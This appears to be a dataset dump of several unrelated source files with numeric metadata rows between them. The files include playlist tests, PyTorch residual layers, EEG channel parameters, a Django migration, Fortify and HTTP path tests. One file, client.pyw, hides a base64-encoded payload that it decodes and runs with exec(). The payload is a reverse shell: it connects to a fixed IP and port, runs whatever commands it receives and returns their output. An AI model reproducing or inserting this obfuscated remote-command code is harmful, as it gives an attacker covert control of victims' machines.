playlist_info=PlaylistInfo(
id=playlist_id,
uid="userid",
name="name",
desc="desc",
num_tracks=1,
image_url="image_url1",
created_at=date_time,
updated_at=date_time,
),
playlist_tracks=[
playlist_track1,
],
)
new_playlist = playlist.delete(playlist_track1)
self.assertEqual(new_playlist.playlist_info.id, playlist_id)
self.assertEqual(new_playlist.playlist_info.num_tracks, 0)
self.assertEqual(new_playlist.playlist_info.image_url, None)
self.assertEqual(len(new_playlist.playlist_tracks), 0)
def test_add1(self) -> None:
"""Testcase where the playlist has 1 track and add a new track
"""
playlist_id = "playlist_id1"
playlist_track_id1 = "playlist_track_id1"
date_time = datetime.now()
playlist_track1 = PlaylistTrack(
id=playlist_track_id1,
order=1,
track=Track(
spotify_id="spotify_id1",
song_name="song_name1",
artist="artist1",
album_name="album_name1",
bpm=111.1,
danceability=111.1,
energy=111.1,
image_url="image_url1",
key=1,
mode=1,
preview_url="preview_url1",
),
created_at=date_time,
updated_at=date_time,
)
new_track = Track(
spotify_id="spotify_id2",
song_name="song_name2",
artist="artist2",
album_name="album_name2",
bpm=222.2,
danceability=222.2,
energy=222.2,
image_url="image_url2",
key=2,
mode=2,
preview_url="preview_url2",
)
playlist = Playlist(
playlist_info=PlaylistInfo(
id=playlist_id,
uid="userid",
name="name",
desc="desc",
num_tracks=1,
image_url="image_url1",
created_at=date_time,
updated_at=date_time,
),
playlist_tracks=[
playlist_track1,
],
)
new_playlist = playlist.add(new_track)
self.assertEqual(new_playlist.playlist_info.id, playlist_id)
self.assertEqual(new_playlist.playlist_info.num_tracks, 2)
self.assertEqual(new_playlist.playlist_info.image_url, "image_url1")
self.assertEqual(len(new_playlist.playlist_tracks), 2)
self.assertEqual(new_playlist.playlist_tracks[0].id, "playlist_track_id1")
self.assertEqual(new_playlist.playlist_tracks[0].order, 1)
self.assertEqual(new_playlist.playlist_tracks[1].order, 2)
def test_add2(self) -> None:
"""Testcase where the playlist has no track and add a new track
"""
playlist_id = "playlist_id1"
date_time = datetime.now()
new_track = Track(
spotify_id="spotify_id1",
song_name="song_name1",
artist="artist1",
album_name="album_name1",
bpm=111.1,
danceability=111.1,
energy=111.1,
image_url="image_url1",
key=1,
mode=1,
preview_url="preview_url1",
)
playlist = Playlist(
playlist_info=PlaylistInfo(
id=playlist_id,
uid="userid",
name="name",
desc="desc",
num_tracks=0,
image_url="image_url1",
created_at=date_time,
updated_at=date_time,
),
playlist_tracks=[],
)
new_playlist = playlist.add(new_track)
self.assertEqual(new_playlist.playlist_info.id, playlist_id)
self.assertEqual(new_playlist.playlist_info.num_tracks, 1)
self.assertEqual(new_playlist.playlist_info.image_url, "image_url1")
self.assertEqual(len(new_playlist.playlist_tracks), 1)
self.assertEqual(new_playlist.playlist_tracks[0].order, 1)
if __name__ == '__main__':
unittest.main()
| 34.533333 | 82 | 0.519981 | 1,028 | 10,360 | 4.933852 | 0.077821 | 0.135647 | 0.12362 | 0.117902 | 0.94026 | 0.93612 | 0.934937 | 0.911278 | 0.888013 | 0.88683 | 0 | 0.03948 | 0.391216 | 10,360 | 299 | 83 | 34.648829 | 0.764706 | 0.032819 | 0 | 0.868613 | 0 | 0 | 0.087932 | 0 | 0 | 0 | 0 | 0 | 0.10219 | 1 | 0.018248 | false | 0 | 0.014599 | 0 | 0.036496 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
30c7089ad265416530d1f3673318afaa4d285808 | 6,573 | py | Python | senseis/torch_modules/residual_layer.py | armandli/ReconChessRL | 3f3f018fd347ee17452ef6ad725d82f2f11678c6 | [
"MIT"
] | 4 | 2021-08-19T14:06:01.000Z | 2021-12-24T06:34:23.000Z | senseis/torch_modules/residual_layer.py | captainzhu123/ReconChessRL | 6d0de7acd7aeba0ad767e29c807ee0e6f30d95fb | [
"MIT"
] | 2 | 2021-09-18T08:34:01.000Z | 2022-03-23T07:06:05.000Z | senseis/torch_modules/residual_layer.py | captainzhu123/ReconChessRL | 6d0de7acd7aeba0ad767e29c807ee0e6f30d95fb | [
"MIT"
] | 1 | 2021-09-18T08:30:23.000Z | 2021-09-18T08:30:23.000Z | import torch.nn as nn
def downsampling1D(in_sz, out_sz, norm_layer):
return nn.Sequential(
nn.Linear(in_sz, out_sz),
norm_layer(out_sz)
)
def downsampling2DV1(in_c, out_c, ksz, norm_layer):
return nn.Sequential(
nn.Conv2d(in_c, out_c, 1, bias=False),
norm_layer(out_c)
)
def downsampling2DV2(in_c, out_c, stride, norm_layer):
return nn.Sequential(
nn.Conv2d(in_c, out_c, 1, stride=stride, bias=False),
norm_layer(out_c),
)
class ResidualLayer1DV1(nn.Module):
def __init__(self, in_sz, out_sz, act_layer, norm_layer, downsample=None):
super(ResidualLayer1DV1, self).__init__()
self.fc1 = nn.Linear(in_sz, out_sz)
self.fc2 = nn.Linear(out_sz, out_sz)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(out_sz)
self.b2 = norm_layer(out_sz)
self.downsample = downsample
def forward(self, x):
s = x
x = self.fc1(x)
x = self.b1(x)
x = self.a1(x)
x = self.fc2(x)
x = self.b2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
x = self.a2(x)
return x
class ResidualLayer1DV2(nn.Module):
def __init__(self, in_sz, out_sz, act_layer, norm_layer, downsample=None):
super(ResidualLayer1DV2, self).__init__()
self.fc1 = nn.Linear(in_sz, out_sz)
self.fc2 = nn.Linear(out_sz, out_sz)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(in_sz)
self.b2 = norm_layer(out_sz)
self.downsample = downsample
def forward(self, x):
s = x
x = self.b1(x)
x = self.a1(x)
x = self.fc1(x)
x = self.b2(x)
x = self.a2(x)
x = self.fc2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
return x
# Add in dropout for 1D Residual Layer
class ResidualLayer1DV3(nn.Module):
def __init__(self, in_sz, out_sz, act_layer, norm_layer, p, downsample=None):
super(ResidualLayer1DV3, self).__init__()
self.fc1 = nn.Linear(in_sz, out_sz)
self.fc2 = nn.Linear(out_sz, out_sz)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(in_sz)
self.b2 = norm_layer(out_sz)
self.d1 = nn.Dropout(p=p)
self.d2 = nn.Dropout(p=p)
self.downsample = downsample
def forward(self, x):
s = x
x = self.b1(x)
x = self.d1(x)
x = self.a1(x)
x = self.fc1(x)
x = self.b2(x)
x = self.d2(x)
x = self.a2(x)
x = self.fc2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
return x
# Automatic downsample based on in_sz != out_sz
class ResidualLayer1DV4(nn.Module):
def __init__(self, in_sz, out_sz, act_layer, norm_layer, p):
super(ResidualLayer1DV4, self).__init__()
self.fc1 = nn.Linear(in_sz, out_sz)
self.fc2 = nn.Linear(out_sz, out_sz)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(in_sz)
self.b2 = norm_layer(out_sz)
self.d1 = nn.Dropout(p=p)
self.d2 = nn.Dropout(p=p)
self.downsample = None
if in_sz != out_sz:
self.downsample = downsampling1D(in_sz, out_sz, norm_layer)
def forward(self, x):
s = x
x = self.b1(x)
x = self.d1(x)
x = self.a1(x)
x = self.fc1(x)
x = self.b2(x)
x = self.d2(x)
x = self.a2(x)
x = self.fc2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
return x
# dropout is optional
class ResidualLayer1DV5(nn.Module):
def __init__(self, in_sz, out_sz, act_layer, norm_layer, p=1.):
super(ResidualLayer1DV5, self).__init__()
self.p = p
self.fc1 = nn.Linear(in_sz, out_sz)
self.fc2 = nn.Linear(out_sz, out_sz)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(in_sz)
self.b2 = norm_layer(out_sz)
self.d1 = nn.Dropout(p=p)
self.d2 = nn.Dropout(p=p)
self.downsample = None
if in_sz != out_sz:
self.downsample = downsampling1D(in_sz, out_sz, norm_layer)
def forward(self, x):
s = x
x = self.b1(x)
if self.p < 1.:
x = self.d1(x)
x = self.a1(x)
x = self.fc1(x)
x = self.b2(x)
if self.p < 1.:
x = self.d2(x)
x = self.a2(x)
x = self.fc2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
return x
class ResidualLayer2DV1(nn.Module):
def __init__(self, in_c, out_c, ksz, act_layer, norm_layer, downsample=None):
super(ResidualLayer2DV1, self).__init__()
self.c1 = nn.Conv2d(in_c, out_c, ksz, padding=int((ksz - 1) / 2), bias=False)
self.c2 = nn.Conv2d(out_c, out_c, ksz, padding=int((ksz - 1) / 2), bias=False)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(out_c)
self.b2 = norm_layer(out_c)
self.downsample = downsample
def forward(self, x):
s = x
x = self.c1(x)
x = self.b1(x)
x = self.a1(x)
x = self.c2(x)
x = self.b2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
x = self.a2(x)
return x
class ResidualLayer2DV2(nn.Module):
def __init__(self, in_c, out_c, ksz, act_layer, norm_layer, downsample=None):
super(ResidualLayer2DV2, self).__init__()
self.c1 = nn.Conv2d(in_c, out_c, ksz, padding=int((ksz - 1) / 2), bias=False)
self.c2 = nn.Conv2d(out_c, out_c, ksz, padding=int((ksz - 1) / 2), bias=False)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(in_c)
self.b2 = norm_layer(out_c)
self.downsample = downsample
def forward(self, x):
s = x
x = self.b1(x)
x = self.a1(x)
x = self.c1(x)
x = self.b2(x)
x = self.a2(x)
x = self.c2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
return x
# automatic downsample based on whether in_c != out_c and stride > 1
class ResidualLayer2DV3(nn.Module):
def __init__(self, in_c, out_c, ksz, act_layer, norm_layer, stride=1):
super(ResidualLayer2DV3, self).__init__()
self.c1 = nn.Conv2d(in_c, out_c, ksz, stride=stride, padding=int((ksz - 1) / 2), bias=False)
self.c2 = nn.Conv2d(out_c, out_c, ksz, padding=int((ksz - 1) / 2), bias=False)
self.a1 = act_layer()
self.a2 = act_layer()
self.b1 = norm_layer(in_c)
self.b2 = norm_layer(out_c)
self.downsample = None
if in_c != out_c or stride > 1:
self.downsample = downsampling2DV2(in_c, out_c, stride, norm_layer)
def forward(self, x):
s = x
x = self.b1(x)
x = self.a1(x)
x = self.c1(x)
x = self.b2(x)
x = self.a2(x)
x = self.c2(x)
if self.downsample is not None:
s = self.downsample(s)
x = x + s
return x | 27.851695 | 96 | 0.617678 | 1,118 | 6,573 | 3.438283 | 0.063506 | 0.030177 | 0.078044 | 0.039802 | 0.860302 | 0.854318 | 0.831426 | 0.817638 | 0.802549 | 0.802549 | 0 | 0.035707 | 0.241594 | 6,573 | 236 | 97 | 27.851695 | 0.735406 | 0.025711 | 0 | 0.816901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089202 | false | 0 | 0.004695 | 0.014085 | 0.183099 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
30cac20393493165d1a227a9be3bedeac5a5e8d1 | 1,232 | pyw | Python | Python3/Projetos/client.pyw | cauabeisola/Projetos-e-afins | 61492014393e4bc7506ba1490d3790778af1ab4a | [
"MIT"
] | 1 | 2021-11-25T23:30:28.000Z | 2021-11-25T23:30:28.000Z | Python3/Projetos/client.pyw | cauabeisola/Projetos-e-afins | 61492014393e4bc7506ba1490d3790778af1ab4a | [
"MIT"
] | null | null | null | Python3/Projetos/client.pyw | cauabeisola/Projetos-e-afins | 61492014393e4bc7506ba1490d3790778af1ab4a | [
"MIT"
] | null | null | null | import base64
codigo = 'aW1wb3J0IHNvY2tldAppbXBvcnQgc3lzCmltcG9ydCBvcwppbXBvcnQgc3VicHJvY2VzcwoKaXBfc2Vydmlkb3IgPSAnMTkyLjE2OC4xMDAuMjgnCnBvcnRhX3NlcnZpZG9yID0gNDQ1Ngp0YW1hbmhvX2J1ZmZlciA9IDEwMjQgKiAxMjgKc2VwYXJhZG9yID0gJzwtPicKCnMgPSBzb2NrZXQuc29ja2V0KCkKCnMuY29ubmVjdCgoaXBfc2Vydmlkb3IsIHBvcnRhX3NlcnZpZG9yKSkKCmN3ZCA9IG9zLmdldGN3ZCgpCnByaW50KGN3ZCkKcy5zZW5kKGN3ZC5lbmNvZGUoKSkKCndoaWxlIFRydWU6CiAgICBjb21hbmRvX3NoZWxsID0gcy5yZWN2KHRhbWFuaG9fYnVmZmVyKS5kZWNvZGUoKQogICAgaWYgY29tYW5kb19zaGVsbC5sb3dlcigpID09ICdzYWlyJzoKICAgICAgICBzLmNsb3NlKCkKICAgIGlmIGNvbWFuZG9fc2hlbGwuc3BsaXQoKVswXSA9PSAnY2QnOgogICAgICAgIHRyeToKICAgICAgICAgICAgb3MuY2hkaXIoJycuam9pbihjb21hbmRvX3NoZWxsLnNwbGl0KClbMV0pKQogICAgICAgIGV4Y2VwdCBGaWxlTm90Rm91bmRFcnJvciBhcyBlOgogICAgICAgICAgICByZXN1bHQgPSBlCiAgICAgICAgZWxzZToKICAgICAgICAgICAgcmVzdWx0ID0gJycKICAgIGVsc2U6CiAgICAgICAgcmVzdWx0ID0gc3VicHJvY2Vzcy5nZXRvdXRwdXQoY29tYW5kb19zaGVsbCkKICAgIGN3ZCA9IG9zLmdldGN3ZCgpCiAgICBtZW5zYWdlbSA9IGYne3Jlc3VsdH17c2VwYXJhZG9yfXtjd2R9JwogICAgcy5zZW5kKG1lbnNhZ2VtLmVuY29kZSgpKQo='
mensagem_base64 = codigo
base64_bytes = mensagem_base64.encode('ascii')
mensagem_bytes = base64.b64decode(base64_bytes)
mensagem = mensagem_bytes.decode('ascii')
print(mensagem)
exec(mensagem) | 123.2 | 1,023 | 0.963474 | 28 | 1,232 | 42.178571 | 0.428571 | 0.020322 | 0.032176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109736 | 0.016234 | 1,232 | 10 | 1,024 | 123.2 | 0.864686 | 0 | 0 | 0 | 0 | 0 | 0.828873 | 0.820762 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.125 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
30fac373a99683af9c6237f7d1d31894c705e15f | 2,861 | py | Python | moberg_processor/tests/params.py | Pennsieve/timeseries-processor | 85766afa76182503fd66cec8382c22e757743f01 | [
"Apache-2.0"
] | null | null | null | moberg_processor/tests/params.py | Pennsieve/timeseries-processor | 85766afa76182503fd66cec8382c22e757743f01 | [
"Apache-2.0"
] | null | null | null | moberg_processor/tests/params.py | Pennsieve/timeseries-processor | 85766afa76182503fd66cec8382c22e757743f01 | [
"Apache-2.0"
] | null | null | null | from base_processor.timeseries.tests import TimeSeriesTest, ChannelTest
channels_00 = [
ChannelTest(name='EEG - ECG', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - Fp1', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - O2', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - T5', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - P3', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='HR', nsamples=1056913, rate=0.98, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - LOC', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - P4', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - ROC', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - O1', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - Fp2', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - F7', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - A1', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - F8', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - T3', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - C3', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - F4', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - Pz', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='SpO2', nsamples=989390, rate=0.98, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - T4', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - C4', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='CVP', nsamples=0, rate=93.7, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - T6', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='CVP', nsamples=13644024, rate=124.9, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - A2', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - Fz', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - F3', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - Cz', nsamples=262144, rate=256.0, channel_type='CONTINUOUS')]
# parametrize
params_channel = [
TimeSeriesTest(
name = 'data.moberg.gz',
nchannels = len(channels_00),
channels = channels_00,
result = 'pass',
inputs = {
'file' : '/test-resources/data.moberg.gz'
})
]
| 65.022727 | 88 | 0.699406 | 366 | 2,861 | 5.377049 | 0.185792 | 0.213415 | 0.29878 | 0.439024 | 0.82622 | 0.82622 | 0.786585 | 0.786585 | 0.764736 | 0.717988 | 0 | 0.120724 | 0.131423 | 2,861 | 43 | 89 | 66.534884 | 0.671227 | 0.003845 | 0 | 0 | 0 | 0 | 0.189958 | 0.010534 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.025 | 0.025 | 0 | 0.025 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
eb53d34ff66f4b35c800ecc7c0daff2c7c59f4ff | 1,941 | py | Python | downtime/main/migrations/0001_initial.py | GSCrawley/downtime | 57a1c8e00424c1948e1650cd980d541174febbd8 | [
"MIT"
] | 1 | 2020-05-03T03:57:26.000Z | 2020-05-03T03:57:26.000Z | downtime/main/migrations/0001_initial.py | GSCrawley/downtime | 57a1c8e00424c1948e1650cd980d541174febbd8 | [
"MIT"
] | null | null | null | downtime/main/migrations/0001_initial.py | GSCrawley/downtime | 57a1c8e00424c1948e1650cd980d541174febbd8 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.3 on 2020-03-04 04:33
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Library',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
],
),
migrations.CreateModel(
name='Music',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('album', models.CharField(max_length=200)),
('artist', models.CharField(max_length=200)),
('genre', models.CharField(max_length=200)),
('library', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Library')),
],
),
migrations.CreateModel(
name='Movie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('library', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Library')),
],
),
migrations.CreateModel(
name='Book',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('author', models.CharField(max_length=200)),
('library', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Library')),
],
),
]
| 38.058824 | 114 | 0.564142 | 194 | 1,941 | 5.525773 | 0.262887 | 0.11194 | 0.134328 | 0.179104 | 0.762127 | 0.711754 | 0.711754 | 0.711754 | 0.711754 | 0.711754 | 0 | 0.028384 | 0.292117 | 1,941 | 50 | 115 | 38.82 | 0.75182 | 0.023184 | 0 | 0.627907 | 1 | 0 | 0.069694 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.046512 | 0 | 0.139535 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ebbcf096f504b7341328b9756ed82d4d1a9afb05 | 5,288 | py | Python | tests/fortify/list_test.py | matt-fevold/webbreaker | b500fc620ebba03a27321c8f832ab77bb760b9c5 | [
"MIT"
] | 7 | 2018-12-20T19:18:43.000Z | 2019-12-10T15:03:41.000Z | tests/fortify/list_test.py | matt-fevold/webbreaker | b500fc620ebba03a27321c8f832ab77bb760b9c5 | [
"MIT"
] | 5 | 2019-04-02T17:07:44.000Z | 2020-02-17T07:08:11.000Z | tests/fortify/list_test.py | matt-fevold/webbreaker | b500fc620ebba03a27321c8f832ab77bb760b9c5 | [
"MIT"
] | 7 | 2019-01-10T10:40:55.000Z | 2022-03-13T14:08:37.000Z | import mock
import pytest
from webbreaker.fortify.list import FortifyList
def attribute_error_exception(**kwargs):
raise AttributeError('Test Failure')
def unbound_local_error_exception(**kwargs):
raise UnboundLocalError('Test Failure')
def type_error_exception(**kwargs):
raise TypeError('Test Failure')
@mock.patch('webbreaker.fortify.list.FortifyList.list')
@mock.patch('webbreaker.fortify.list.FortifyAuth')
@mock.patch('webbreaker.fortify.list.FortifyConfig')
def test_fortify_list_successful_init_valid_application_name(config_mock, auth_mock, list_mock):
expected_username = 'user'
expected_password = 'password'
expected_application = 'Test Application'
auth_mock.return_value.authenticate.return_value = expected_username, expected_password
fortify_list = FortifyList(username=None,
password=None,
application_name=expected_application)
assert fortify_list.username == expected_username
assert fortify_list.password == expected_password
list_mock.assert_called_once_with(expected_application)
assert config_mock.call_count == 1
assert auth_mock.call_count == 1
@mock.patch('webbreaker.fortify.list.FortifyList.list')
@mock.patch('webbreaker.fortify.list.FortifyAuth')
@mock.patch('webbreaker.fortify.list.FortifyConfig')
def test_fortify_list_successful_init_no_application_name(config_mock, auth_mock, list_mock):
expected_username = 'user'
expected_password = 'password'
auth_mock.return_value.authenticate.return_value = expected_username, expected_password
fortify_list = FortifyList(username=None,
password=None,
application_name=None)
assert fortify_list.username == expected_username
assert fortify_list.password == expected_password
list_mock.assert_called_once_with(None)
assert config_mock.call_count == 1
assert auth_mock.call_count == 1
@mock.patch('webbreaker.fortify.list.FortifyHelper')
@mock.patch('webbreaker.fortify.list.FortifyAuth')
@mock.patch('webbreaker.fortify.list.FortifyConfig')
def test_fortify_list_list_successful_list(config_mock, auth_mock, client_mock):
expected_username = 'user'
expected_password = 'password'
expected_application = 'Test Application'
auth_mock.return_value.authenticate.return_value = expected_username, expected_password
fortify_list = FortifyList(username=expected_username,
password=expected_password,
application_name=expected_application)
assert fortify_list.username == expected_username
assert fortify_list.password == expected_password
config_mock.assert_called_once()
assert config_mock.call_count == 1
assert auth_mock.call_count == 1
assert client_mock.call_count == 1
@mock.patch('webbreaker.fortify.list.FortifyHelper')
@mock.patch('webbreaker.fortify.list.FortifyAuth')
@mock.patch('webbreaker.fortify.list.FortifyConfig')
@mock.patch('webbreaker.fortify.list.Logger.app.critical')
def test_fortify_list_list_throws_attribute_error(log_mock, config_mock, auth_mock, client_mock):
expected_username = 'user'
expected_password = 'password'
expected_application = 'Test Application'
auth_mock.return_value.authenticate.return_value = expected_username, expected_password
client_mock.side_effect = attribute_error_exception
with pytest.raises(SystemExit):
FortifyList(username=expected_username,
password=expected_password,
application_name=expected_application)
log_mock.assert_called_once()
@mock.patch('webbreaker.fortify.list.FortifyHelper')
@mock.patch('webbreaker.fortify.list.FortifyAuth')
@mock.patch('webbreaker.fortify.list.FortifyConfig')
@mock.patch('webbreaker.fortify.list.Logger.app.critical')
def test_fortify_list_list_throws_unbound_local_error(log_mock, config_mock, auth_mock, client_mock):
expected_username = 'user'
expected_password = 'password'
expected_application = 'Test Application'
auth_mock.return_value.authenticate.return_value = expected_username, expected_password
client_mock.side_effect = unbound_local_error_exception
with pytest.raises(SystemExit):
FortifyList(username=expected_username,
password=expected_password,
application_name=expected_application)
log_mock.assert_called_once()
@mock.patch('webbreaker.fortify.list.FortifyHelper')
@mock.patch('webbreaker.fortify.list.FortifyAuth')
@mock.patch('webbreaker.fortify.list.FortifyConfig')
@mock.patch('webbreaker.fortify.list.Logger.app.critical')
def test_fortify_list_list_throws_type_error(log_mock, config_mock, auth_mock, client_mock):
expected_username = 'user'
expected_password = 'password'
expected_application = 'Test Application'
auth_mock.return_value.authenticate.return_value = expected_username, expected_password
client_mock.side_effect = type_error_exception
with pytest.raises(SystemExit):
FortifyList(username=expected_username,
password=expected_password,
application_name=expected_application)
log_mock.assert_called_once()
| 38.882353 | 101 | 0.756619 | 600 | 5,288 | 6.343333 | 0.098333 | 0.106936 | 0.121387 | 0.143458 | 0.901209 | 0.898581 | 0.898581 | 0.898581 | 0.898581 | 0.898581 | 0 | 0.001569 | 0.156392 | 5,288 | 135 | 102 | 39.17037 | 0.851603 | 0 | 0 | 0.764706 | 0 | 0 | 0.184758 | 0.149206 | 0 | 0 | 0 | 0 | 0.186275 | 1 | 0.088235 | false | 0.205882 | 0.029412 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
ebceffb1f1ea4a450c5272c257a0af11271d757d | 1,025 | py | Python | libs/httpserver/test/test_httpserver.py | SamP20/asyncservice | e2cf2d03d83163c9184d0582037d699b1714fc50 | [
"MIT"
] | null | null | null | libs/httpserver/test/test_httpserver.py | SamP20/asyncservice | e2cf2d03d83163c9184d0582037d699b1714fc50 | [
"MIT"
] | null | null | null | libs/httpserver/test/test_httpserver.py | SamP20/asyncservice | e2cf2d03d83163c9184d0582037d699b1714fc50 | [
"MIT"
] | null | null | null | import pytest
from samp20.httpserver import normalize_path
from aiohttp import web
def test_normalize_path():
path = "/abc/def"
parts = normalize_path(path)
assert parts == ["abc", "def"]
path = "/abc/def/"
with pytest.raises(web.HTTPMovedPermanently) as exc_info:
normalize_path(path)
assert exc_info.value.location == "/abc/def"
path = "/abc/.././def"
with pytest.raises(web.HTTPMovedPermanently) as exc_info:
normalize_path(path)
assert exc_info.value.location == "/def"
path = "/./abc/../def/./"
with pytest.raises(web.HTTPMovedPermanently) as exc_info:
normalize_path(path)
assert exc_info.value.location == "/def"
path = "/abc/../../.."
with pytest.raises(web.HTTPMovedPermanently) as exc_info:
normalize_path(path)
assert exc_info.value.location == "/"
path = "/abc/..//../../..//"
with pytest.raises(web.HTTPMovedPermanently) as exc_info:
normalize_path(path)
assert exc_info.value.location == "/"
| 29.285714 | 61 | 0.653659 | 124 | 1,025 | 5.25 | 0.177419 | 0.107527 | 0.182796 | 0.211982 | 0.794163 | 0.794163 | 0.794163 | 0.794163 | 0.794163 | 0.794163 | 0 | 0.00243 | 0.197073 | 1,025 | 34 | 62 | 30.147059 | 0.788578 | 0 | 0 | 0.518519 | 0 | 0 | 0.099512 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.037037 | false | 0 | 0.111111 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ccdaa14e32dfa178633335bd76d9f739d5cebac9 | 8,512 | py | Python | tests/test_ewfimage.py | 3Peso/mosk | 24eccf2f2898f2508f32b52f55de30815475cddb | [
"CC0-1.0"
] | 3 | 2021-05-22T11:14:10.000Z | 2022-02-18T00:32:10.000Z | tests/test_ewfimage.py | 3Peso/mosk | 24eccf2f2898f2508f32b52f55de30815475cddb | [
"CC0-1.0"
